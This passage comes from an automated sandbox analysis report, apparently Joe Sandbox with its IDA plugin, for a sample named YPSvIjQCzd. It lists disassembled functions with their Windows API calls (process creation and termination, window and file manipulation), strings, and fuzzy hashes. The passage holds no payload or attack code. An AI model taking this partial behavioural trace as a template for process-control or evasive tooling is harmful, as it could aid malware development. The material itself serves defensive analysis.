Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 194e85a239c7f4a96f9532dbaf21981ecd5dbf43d524f1b5f74e70e728cd687a
Instruction ID: 56191f1ff80a3a8b00b278ae9f491331c9462aba780fbfc6696f3ec8bddafd89
Opcode Fuzzy Hash: 194e85a239c7f4a96f9532dbaf21981ecd5dbf43d524f1b5f74e70e728cd687a
Instruction Fuzzy Hash: 5A21D670A00214BBDF05AB60CC85EFEBBB8FF58300F104116F961972A2EB795959DB20

Function 00829645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00829651
GetClassNameW.USER32(00000000,?,00000100), ref: 00829666
_wcscmp.LIBCMT ref: 00829678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008296F3

Strings

largeicons, xrefs: 00829687
details, xrefs: 008296A1
smallicons, xrefs: 008296BB
SHELLDLL_DefView, xrefs: 00829672
list, xrefs: 008296D5

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 50973246246e2144c030464504ac80d5bb5dc73da81d5236a495808be72f2aa0
Instruction ID: 41d89a6dd4083a733222372304537bc333e3f9fdc1a4914352f120a39686d08d
Opcode Fuzzy Hash: 50973246246e2144c030464504ac80d5bb5dc73da81d5236a495808be72f2aa0
Instruction Fuzzy Hash: FA110A7624832FFAFA013624EC0ADB777DCFF24364F200026FA50E51D2FE5959909658

Function 00834189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0083419D
__swprintf.LIBCMT ref: 008341AA

Part of subcall function 007F38D8: __woutput_l.LIBCMT ref: 007F3931

FindResourceW.KERNEL32(?,?,0000000E), ref: 008341D4
LoadResource.KERNEL32(?,00000000), ref: 008341E0
LockResource.KERNEL32(00000000), ref: 008341ED
FindResourceW.KERNEL32(?,?,00000003), ref: 0083420D
LoadResource.KERNEL32(?,00000000), ref: 0083421F
SizeofResource.KERNEL32(?,00000000), ref: 0083422E
LockResource.KERNEL32(?), ref: 0083423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0083429B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 7b64878947071d6b34119172cbf6019901cb732003c8ee2e4a75e7bb98b60128
Instruction ID: aa15a6d8dcf69d0a6f0d5926d6b2f963e0a08bac24f495eff8d3e8de78e036d1
Opcode Fuzzy Hash: 7b64878947071d6b34119172cbf6019901cb732003c8ee2e4a75e7bb98b60128
Instruction Fuzzy Hash: 9731B2B160520AAFDB119F60DC48EBF7BADFF44302F044525FA05E2151D778E951CBA0

Function 008316DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00831700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00830778,?,00000001), ref: 00831714
GetWindowThreadProcessId.USER32(00000000), ref: 0083171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830778,?,00000001), ref: 0083172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0083173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830778,?,00000001), ref: 00831755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830778,?,00000001), ref: 00831767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00830778,?,00000001), ref: 008317AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00830778,?,00000001), ref: 008317C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00830778,?,00000001), ref: 008317CC

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 0cedfc8d2eb40233445efb60ae40356effe4f0c2cd472b8d083bbf78b5e00eea
Instruction ID: 6dc937a396202dbb1e2411ef35ada58d7f39e5cb7348fe381c3e7d40ae8ad979
Opcode Fuzzy Hash: 0cedfc8d2eb40233445efb60ae40356effe4f0c2cd472b8d083bbf78b5e00eea
Instruction Fuzzy Hash: F7319175614304BBEF11AF24DC88F797BE9FB95B12F184026F906D72A4DB789D408BA0

Function 0082A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0082AA64), ref: 0082A9A2

Strings

CLASSNN, xrefs: 0082A744
REGEXPCLASS, xrefs: 0082A767
INSTANCE, xrefs: 0082A8B0
TEXT, xrefs: 0082A8D9
CLASS, xrefs: 0082A721
NAME, xrefs: 0082A7D4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: fec5c2f0c214fafcbc55198a1f50388e482a91d89d4385d6aec203c25f677244
Instruction ID: 52ce1cbf76e0a9b6d7b1b04cccebc61bf1b977a44dc27d305c5c8a9cacde2e07
Opcode Fuzzy Hash: fec5c2f0c214fafcbc55198a1f50388e482a91d89d4385d6aec203c25f677244
Instruction Fuzzy Hash: 41919E7060061AEBCB1CEFA0D485BE9FB74FF04304F508129D99AE7241DB346AD9CBA1

Function 007D2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 007D2EAE

Part of subcall function 007D1DB3: GetClientRect.USER32(?,?), ref: 007D1DDC
Part of subcall function 007D1DB3: GetWindowRect.USER32(?,?), ref: 007D1E1D
Part of subcall function 007D1DB3: ScreenToClient.USER32(?,?), ref: 007D1E45

GetDC.USER32 ref: 0080CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0080CF95
SelectObject.GDI32(00000000,00000000), ref: 0080CFA3
SelectObject.GDI32(00000000,00000000), ref: 0080CFB8
ReleaseDC.USER32(?,00000000), ref: 0080CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0080D04B

Strings

U, xrefs: 0080CF20

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c60cdb821e5824ac4f53f3656ff06fd54f39917f6c255493842787c4eb47a8f6
Instruction ID: 01f56eda89608406369e582ca4adbfe6eaceee78cc528d38d9940389e4254967
Opcode Fuzzy Hash: c60cdb821e5824ac4f53f3656ff06fd54f39917f6c255493842787c4eb47a8f6
Instruction Fuzzy Hash: 2271F431500205EFCF219FA4CC84ABA7BB6FF48350F18426AED559A2A6D7358C52DF61

Function 0084F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0084F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0084FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0084FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0084FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0084FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0084FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0084FD90
CloseHandle.KERNEL32(?), ref: 0084FDBF
CloseHandle.KERNEL32(?), ref: 0084FE36

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: aaea8d3469f58a0cb50d247ec04616962c8682f74afa706ecc7023a52c9dcbe6
Instruction ID: f2e214716fa2670abe2e9aeaf7ef359ea9e508df02cc25f794dd8b9cb5cb00c6
Opcode Fuzzy Hash: aaea8d3469f58a0cb50d247ec04616962c8682f74afa706ecc7023a52c9dcbe6
Instruction Fuzzy Hash: 47E1AD31204255DFCB14EF24C895A6ABBE0FF85314F14886DFA998B3A2DB35EC44CB52

Function 007D201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 007D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007D2036,?,00000000,?,?,?,?,007D16CB,00000000,?), ref: 007D1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007D20D3
KillTimer.USER32(-00000001,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 007D216E
DestroyAcceleratorTable.USER32(00000000), ref: 0080BEF6
DeleteObject.GDI32(00000000), ref: 0080BF6C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 8822d3ba99f47d5702953ad81d3314b127cc7b8f83dc76dff67f3f3a62af63e9
Instruction ID: 8244b316f42be456514b223c35f18278e285f9f1435798b140abfe2237a8d517
Opcode Fuzzy Hash: 8822d3ba99f47d5702953ad81d3314b127cc7b8f83dc76dff67f3f3a62af63e9
Instruction Fuzzy Hash: 11619D31100701EFCB35AF14DD48B2AB7F1FF64316F18852AE54297AA2DB79A892DF50

Function 00834F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008338D3,?), ref: 008348C7

Part of subcall function 008348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008338D3,?), ref: 008348E0

Part of subcall function 00834CD3: GetFileAttributesW.KERNEL32(?,00833947), ref: 00834CD4

lstrcmpiW.KERNEL32(?,?), ref: 00834FE2
_wcscmp.LIBCMT ref: 00834FFC
MoveFileW.KERNEL32(?,?), ref: 00835017

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 9ccf0ea0b52e901a6947c91a5707b195d104113d6687982df0d71f5b4ef41747
Instruction ID: 7dff7aaeb6ba89f560b0a1fcaab2a494d1b321e86da9d3ef83a80398e1b29c3c
Opcode Fuzzy Hash: 9ccf0ea0b52e901a6947c91a5707b195d104113d6687982df0d71f5b4ef41747
Instruction Fuzzy Hash: 145174B20087859BC724DB54C8859DFB7ECEFC4301F10492EB285D3152EF75A689C7A6

Function 008588B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0085896E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ea507cb398c1181a8817a14f86f1bb6a843f6d0b216cb5f454af3f36b11c1be3
Instruction ID: 3f4511c8577c5e2a490385e4878866072edc81e39021a839576171ca6cc3f279
Opcode Fuzzy Hash: ea507cb398c1181a8817a14f86f1bb6a843f6d0b216cb5f454af3f36b11c1be3
Instruction Fuzzy Hash: 0E51B330600218FFDF219F28CC89B693B65FB05356F644163FD11F66A1DF75A9988B82

Function 007D2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0080C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0080C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0080C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0080C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0080C5C0
DestroyCursor.USER32(00000000), ref: 0080C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0080C5EC
DestroyCursor.USER32(?), ref: 0080C5FB

Part of subcall function 0085A71E: DeleteObject.GDI32(00000000), ref: 0085A757

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2975913752-0
Opcode ID: 023b1b457b6a8568c46ab3a575c8bd1f9f73354271d0ff0b473364974dc4fcb9
Instruction ID: 1fe5eda0039e75376a3580fa17dd0378736ce9c36afea4351247f55a114c6406
Opcode Fuzzy Hash: 023b1b457b6a8568c46ab3a575c8bd1f9f73354271d0ff0b473364974dc4fcb9
Instruction Fuzzy Hash: 43516B74610205AFDB24DF24CC45BAA77B5FB68351F10062AF902E72E1E774ED92DB60

Function 00828E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00828A84,00000B00,?,?), ref: 00828E0C
RtlAllocateHeap.NTDLL(00000000,?,00828A84), ref: 00828E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00828A84,00000B00,?,?), ref: 00828E28
GetCurrentProcess.KERNEL32(?,00000000,?,00828A84,00000B00,?,?), ref: 00828E30
DuplicateHandle.KERNEL32(00000000,?,00828A84,00000B00,?,?), ref: 00828E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00828A84,00000B00,?,?), ref: 00828E43
GetCurrentProcess.KERNEL32(00828A84,00000000,?,00828A84,00000B00,?,?), ref: 00828E4B
DuplicateHandle.KERNEL32(00000000,?,00828A84,00000B00,?,?), ref: 00828E4E
CreateThread.KERNEL32(00000000,00000000,00828E74,00000000,00000000,00000000), ref: 00828E68

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: 8715703a80da6191356ac55ec18045e082e1d3853fe474158a8987351531d8f6
Instruction ID: 76f905c37e91e7db5ee66103a2751e87faf30526692bf8654746a5e3307974c1
Opcode Fuzzy Hash: 8715703a80da6191356ac55ec18045e082e1d3853fe474158a8987351531d8f6
Instruction Fuzzy Hash: 0E01ACB5680704FFE611AB65DC49F5B3B6CFB89711F414421FA05DB191CA7498048A20

Function 00849428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0084947C
VariantInit.OLEAUT32(?), ref: 0084954D
VariantInit.OLEAUT32(?), ref: 0084964E
VariantClear.OLEAUT32(?), ref: 00849658
VariantClear.OLEAUT32(?), ref: 008496B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 008494DD, 0084960B, 008496C3
Incorrect Object type in FOR..IN loop, xrefs: 00849631

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 11e59f235224d05f920ea7d8cfdd66ec1cf85d0d7dbde767b0345dc5e60b2ec6
Instruction ID: 1c58233479757792cf0d3533addfebd92b0dfbf7f6d90b0e4c1db99d72f93b07
Opcode Fuzzy Hash: 11e59f235224d05f920ea7d8cfdd66ec1cf85d0d7dbde767b0345dc5e60b2ec6
Instruction Fuzzy Hash: 9991AA70A00219ABDF34DFA4C848FAFBBB8FF95314F11815AE559EB280D7749905CBA0

Function 00856FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00857093
SendMessageW.USER32(?,00001036,00000000,?), ref: 008570A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008570C1
_wcscat.LIBCMT ref: 0085711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00857133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00857161

Strings

SysListView32, xrefs: 00857065

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: b8807a405c1f28b38d451301161bde7179af6c4879cb3cf49ec0323015c67b5e
Instruction ID: aaf41072ae29b70a1aedc41a4cae18ede66da5c7926b9ff6c8b4c10ae572a706
Opcode Fuzzy Hash: b8807a405c1f28b38d451301161bde7179af6c4879cb3cf49ec0323015c67b5e
Instruction Fuzzy Hash: D941A270A44308ABEB219FA4DC89BEA77E8FF08351F10452AF944E72D2D6759D888B50

Function 0084EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00833E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00833EB6
Part of subcall function 00833E91: Process32FirstW.KERNEL32(00000000,?), ref: 00833EC4
Part of subcall function 00833E91: CloseHandle.KERNEL32(00000000), ref: 00833F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084ECB8
GetLastError.KERNEL32 ref: 0084ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0084ED77
GetLastError.KERNEL32(00000000), ref: 0084ED82
